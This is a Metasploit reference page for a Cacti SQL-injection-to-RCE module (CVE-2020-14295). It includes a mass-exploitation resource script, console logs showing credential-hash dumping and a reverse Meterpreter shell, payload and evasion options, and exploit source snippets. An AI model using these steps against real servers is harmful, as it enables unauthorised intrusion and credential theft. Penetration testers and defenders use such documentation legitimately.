Cacti color filter authenticated SQLi to RCE - Metasploit


This page contains detailed information about how to use the exploit/unix/http/cacti_filter_sqli_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Cacti color filter authenticated SQLi to RCE
Module: exploit/unix/http/cacti_filter_sqli_rce
Source code: modules/exploits/unix/http/cacti_filter_sqli_rce.rb
Disclosure date: 2020-06-17
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-14295

This module exploits a SQL injection vulnerability in Cacti 1.2.12 and before. An admin can exploit the filter variable within color.php to pull arbitrary values as well as conduct stacked queries. With stacked queries, the path_php_binary value is changed within the settings table to a payload, and an update is called to execute the payload. After calling the payload, the value is reset.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • config-changes: Module modifies some configuration setting on the target machine.
  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


Using cacti_filter_sqli_rce against a single host

Normally, you can use exploit/unix/http/cacti_filter_sqli_rce this way:

msf > use exploit/unix/http/cacti_filter_sqli_rce
msf exploit(cacti_filter_sqli_rce) > show targets
    ... a list of targets ...
msf exploit(cacti_filter_sqli_rce) > set TARGET target-id
msf exploit(cacti_filter_sqli_rce) > show options
    ... show and set options ...
msf exploit(cacti_filter_sqli_rce) > exploit

Using cacti_filter_sqli_rce against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your cacti_filter_sqli_rce will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/unix/http/cacti_filter_sqli_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module exploits a SQL injection vulnerability in Cacti 1.2.12 and before. An admin can exploit the filter variable within color.php to pull arbitrary values as well as conduct stacked queries. With stacked queries, the path_php_binary value is changed within the settings table to a payload, and an update is called to execute the payload.

After calling the payload, the value is reset. This has to be done from a new login session as any requests with the already logged in cookie will timeout.

Install

Docker

git clone https://github.com/scline/docker-cacti.git
cd docker-cacti

rm -rf cacti
git checkout 1.2.11 -- cacti
cp ./docker-compose/cacti_testing.yml ./docker-compose.yml
sudo docker-compose up

Navigate to localhost:80 and login with admin:admin and run through the install steps.

Ubuntu

As of the writing of this module, Ubuntu's 12.04 repo had cacti as 1.2.10, so a simple apt-get install cacti will install a vulnerable version.

Verification Steps


  1. Install the application
  2. Start msfconsole
  3. Do: use modules/exploits/unix/http/cacti_filter_sqli_rce
  4. Do: set rhost [ip]
  5. Do: set username [username]
  6. Do: set password [password]
  7. Do: run
  8. You should get a shell.

Options


CREDS

This option will dump usernames and passwords from cacti and database them. Defaults to true

Scenarios


Cacti 1.2.10 on Ubuntu 20.04

[*] Processing cacti.rb for ERB directives.
resource (cacti.rb)> use modules/exploits/unix/http/cacti_filter_sqli_rce
[*] Using configured payload php/meterpreter/reverse_tcp
resource (cacti.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (cacti.rb)> set verbose true
verbose => true
resource (cacti.rb)> set password cacti
password => cacti
resource (cacti.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (cacti.rb)> run
[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Grabbing CSRF
[+] CSRF: sid:68e686c74fdfc4c04ed024ac27aba1d4815d5ad7,1621164610
[*] Attempting login
[*] Dumping creds
[+] Username: admin, Password Hash: $2y$10$fz.rRKSZPUMPccWOuCtWiO3csioHb8L7319uKAiMXZez2/HtLSg4q
[+] Username: guest, Password Hash: 43e9a4ab75570f5b
[*] Backing-up path_php_binary value
[+] path_php_binary: /usr/bin/php
[*] Uploading payload
[+] Executing Payload
[*] Sending stage (39282 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49470) at 2021-05-16 07:30:11 -0400
[*] Cleaning up environment
[*] Grabbing CSRF
[+] CSRF: sid:e17aa4e5f4aa6d4c189cea4b7f0539123f4b5439,1621164632
[*] Attempting login
[*] Resetting DB Value

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu2004
OS          : Linux ubuntu2004 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
Meterpreter : php/linux

Go back to menu.

Msfconsole Usage


Here is how the unix/http/cacti_filter_sqli_rce exploit module looks in the msfconsole:

msf6 > use exploit/unix/http/cacti_filter_sqli_rce

[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(unix/http/cacti_filter_sqli_rce) > show info

       Name: Cacti color filter authenticated SQLi to RCE
     Module: exploit/unix/http/cacti_filter_sqli_rce
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-06-17

Provided by:
  h00die
  Leonardo Paiva
  Mayfly277

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Automatic Target

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  CREDS      true             no        Dump cacti creds
  PASSWORD   admin            no        Password to login with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /cacti/          yes       The URI of Cacti
  USERNAME   admin            yes       User to login with
  VHOST                       no        HTTP server virtual host

Payload information:
  Avoid: 2 characters

Description:
  This module exploits a SQL injection vulnerability in Cacti 1.2.12 
  and before. An admin can exploit the filter variable within 
  color.php to pull arbitrary values as well as conduct stacked 
  queries. With stacked queries, the path_php_binary value is changed 
  within the settings table to a payload, and an update is called to 
  execute the payload. After calling the payload, the value is reset.

References:
  https://www.exploit-db.com/exploits/49810
  https://github.com/Cacti/cacti/issues/3622
  https://nvd.nist.gov/vuln/detail/CVE-2020-14295

Side Effects:
  config-changes
  ioc-in-logs

Module Options


This is a complete list of options available in the unix/http/cacti_filter_sqli_rce exploit:

msf6 exploit(unix/http/cacti_filter_sqli_rce) > show options

Module options (exploit/unix/http/cacti_filter_sqli_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CREDS      true             no        Dump cacti creds
   PASSWORD   admin            no        Password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /cacti/          yes       The URI of Cacti
   USERNAME   admin            yes       User to login with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Advanced Options


Here is a complete list of advanced options supported by the unix/http/cacti_filter_sqli_rce exploit:

msf6 exploit(unix/http/cacti_filter_sqli_rce) > show advanced

Module advanced options (exploit/unix/http/cacti_filter_sqli_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   AutoCheck               true                                                no        Run check before exploit
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                               no        Override check result
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/http/cacti_filter_sqli_rce module can exploit:

msf6 exploit(unix/http/cacti_filter_sqli_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Target

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/http/cacti_filter_sqli_rce exploit:

msf6 exploit(unix/http/cacti_filter_sqli_rce) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   18  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the unix/http/cacti_filter_sqli_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/http/cacti_filter_sqli_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Could not connect to web service - no response


Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:

67:	    begin
68:	      res = send_request_cgi(
69:	        'uri' => normalize_uri(target_uri.path, 'index.php'),
70:	        'method' => 'GET'
71:	      )
72:	      return CheckCode::Safe("#{peer} - Could not connect to web service - no response") if res.nil?
73:	      return CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
74:	
75:	      # cacti gives us the version in a JS variable
76:	      /var cactiVersion='(?<version>\d{1,2}\.\d{1,2}\.\d{1,2})'/ =~ res.body
77:	

<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>


Here is a relevant code snippet related to the "<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>" error message:

68:	      res = send_request_cgi(
69:	        'uri' => normalize_uri(target_uri.path, 'index.php'),
70:	        'method' => 'GET'
71:	      )
72:	      return CheckCode::Safe("#{peer} - Could not connect to web service - no response") if res.nil?
73:	      return CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
74:	
75:	      # cacti gives us the version in a JS variable
76:	      /var cactiVersion='(?<version>\d{1,2}\.\d{1,2}\.\d{1,2})'/ =~ res.body
77:	
78:	      if version && Rex::Version.new(version) <= Rex::Version.new('1.2.12')

<PEER> - Could not connect to the web service


Here is a relevant code snippet related to the "<PEER> - Could not connect to the web service" error message:

78:	      if version && Rex::Version.new(version) <= Rex::Version.new('1.2.12')
79:	        vprint_good("Version Detected: #{version}")
80:	        return CheckCode::Appears
81:	      end
82:	    rescue ::Rex::ConnectionError
83:	      CheckCode::Safe("#{peer} - Could not connect to the web service") # unknown maybe?
84:	    end
85:	    CheckCode::Safe("Cacti #{version} is not a vulnerable version.")
86:	  end
87:	
88:	  def exploit

Cacti <VERSION> is not a vulnerable version.


Here is a relevant code snippet related to the "Cacti <VERSION> is not a vulnerable version." error message:

80:	        return CheckCode::Appears
81:	      end
82:	    rescue ::Rex::ConnectionError
83:	      CheckCode::Safe("#{peer} - Could not connect to the web service") # unknown maybe?
84:	    end
85:	    CheckCode::Safe("Cacti #{version} is not a vulnerable version.")
86:	  end
87:	
88:	  def exploit
89:	    login
90:	

<PEER> - Unable to retrieve path_php_binary from server


Here is a relevant code snippet related to the "<PEER> - Unable to retrieve path_php_binary from server" error message:

118:	    # "name","hex"
119:	    # "","FEFCFF"
120:	    # "/usr/bin/php","3"
121:	    if res && !res.body.nil?
122:	      php_binary = res.body.split.last # check to make sure we have something first before proceeding
123:	      fail_with(Failure::NotFound, "#{peer} - Unable to retrieve path_php_binary from server") if php_binary.nil?
124:	      php_binary = php_binary.split(',')[0].gsub('"', '') # take last entry on page, and split to value
125:	    end
126:	    fail_with(Failure::NotFound, "#{peer} - Unable to retrieve path_php_binary from server") unless php_binary
127:	    print_good("path_php_binary: #{php_binary}")
128:	

<PEER> - Unable to retrieve path_php_binary from server


Here is a relevant code snippet related to the "<PEER> - Unable to retrieve path_php_binary from server" error message:

121:	    if res && !res.body.nil?
122:	      php_binary = res.body.split.last # check to make sure we have something first before proceeding
123:	      fail_with(Failure::NotFound, "#{peer} - Unable to retrieve path_php_binary from server") if php_binary.nil?
124:	      php_binary = php_binary.split(',')[0].gsub('"', '') # take last entry on page, and split to value
125:	    end
126:	    fail_with(Failure::NotFound, "#{peer} - Unable to retrieve path_php_binary from server") unless php_binary
127:	    print_good("path_php_binary: #{php_binary}")
128:	
129:	    print_status('Uploading payload')
130:	    begin
131:	      pload = "#{php_binary} -r '#{payload.encoded}' #"

<PEER> - Could not connect to the web service


Here is a relevant code snippet related to the "<PEER> - Could not connect to the web service" error message:

135:	      trigger
136:	    ensure
137:	      resetsqli(php_binary)
138:	    end
139:	  rescue ::Rex::ConnectionError
140:	    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
141:	  end
142:	
143:	  def login
144:	    cookie_jar.clear
145:	

<PEER> - Could not connect to web service - no response


Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:

146:	    print_status('Grabbing CSRF')
147:	    res = send_request_cgi(
148:	      'uri' => normalize_uri(target_uri.path, 'index.php'),
149:	      'keep_cookies' => true
150:	    )
151:	    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
152:	    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
153:	
154:	    /name='__csrf_magic' value="(?<csrf>[^"]+)"/ =~ res.body
155:	    fail_with(Failure::NotFound, 'Unable to find CSRF token') unless csrf
156:	

<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>


Here is a relevant code snippet related to the "<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>" error message:

147:	    res = send_request_cgi(
148:	      'uri' => normalize_uri(target_uri.path, 'index.php'),
149:	      'keep_cookies' => true
150:	    )
151:	    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
152:	    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
153:	
154:	    /name='__csrf_magic' value="(?<csrf>[^"]+)"/ =~ res.body
155:	    fail_with(Failure::NotFound, 'Unable to find CSRF token') unless csrf
156:	
157:	    print_good("CSRF: #{csrf}")

Unable to find CSRF token


Here is a relevant code snippet related to the "Unable to find CSRF token" error message:

150:	    )
151:	    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
152:	    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
153:	
154:	    /name='__csrf_magic' value="(?<csrf>[^"]+)"/ =~ res.body
155:	    fail_with(Failure::NotFound, 'Unable to find CSRF token') unless csrf
156:	
157:	    print_good("CSRF: #{csrf}")
158:	
159:	    print_status('Attempting login')
160:	    res = send_request_cgi(

<PEER> - Invalid credentials (response code: <RES.CODE>)


Here is a relevant code snippet related to the "<PEER> - Invalid credentials (response code: <RES.CODE>)" error message:

168:	        '__csrf_magic' => csrf
169:	      }
170:	    )
171:	
172:	    if res && res.code != 302
173:	      fail_with(Failure::NoAccess, "#{peer} - Invalid credentials (response code: #{res.code})")
174:	    end
175:	
176:	    res
177:	  end
178:	

<PEER> - Injection Failed (response code: <RES.CODE>)


Here is a relevant code snippet related to the "<PEER> - Injection Failed (response code: <RES.CODE>)" error message:

181:	      'uri' => "#{normalize_uri(target_uri.path, 'color.php')}?action=export&header=false&filter=1#{content}--+-",
182:	      'keep_cookies' => true
183:	    )
184:	
185:	    if res && res.code != 200
186:	      fail_with(Failure::UnexpectedReply, "#{peer} - Injection Failed (response code: #{res.code})")
187:	    end
188:	    res
189:	  end
190:	
191:	  def trigger

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • h00die
  • Leonardo Paiva
  • Mayfly277

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.